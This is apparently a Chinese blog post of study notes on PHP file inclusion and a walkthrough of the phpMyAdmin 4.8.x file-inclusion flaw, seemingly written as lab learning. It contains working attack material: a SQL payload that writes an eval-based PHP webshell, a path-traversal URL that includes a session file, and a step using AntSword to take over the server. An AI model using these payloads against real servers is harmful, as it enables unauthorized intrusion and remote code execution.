文件包含(本地文件+远程文件)

 

 这两个函数并不会在意包含文件的后缀名是什么,都会把其当作php代码执行

 

简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。
要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启)

 

相对路径与绝对路径

 

进入一个不存在的目录,这里目录的名字里不能有?*号,否则报错,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。

 

 

 

phpMyAdmin  远程文件包含漏洞

在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件

基本步骤:

可以将 WebShell 写入,首先从phpinfo()中查看 web 路径:
搜索CONTEXT_DOCUMENT_ROOT:

 

 

构造Payload:

select "<?php file_put_contents('/var/www/html/shell.php','<?php @eval($_POST[cmd]);?>')?>"

 

 php生成session时,会生成在/tmp目录下,且以sess_开头,例如:/tmp/sess_be9f3bebfb7ab4192fd07c479cf6b171,其中记录着用户的操作

再次包含文件:

http://x.x.x.x/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_2c3dd215ccd61cdb6066d8cab495bcba
(这一步再次包含文件还不清楚怎么做)
访问http://x.x.x.x/shell.php,

webshell 已经写入,使用蚁剑连接,

成功获取到目标服务器权限。

posted @   heartbeat111  阅读(463)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· NetPad:一个.NET开源、跨平台的C#编辑器
点击右上角即可分享
微信分享提示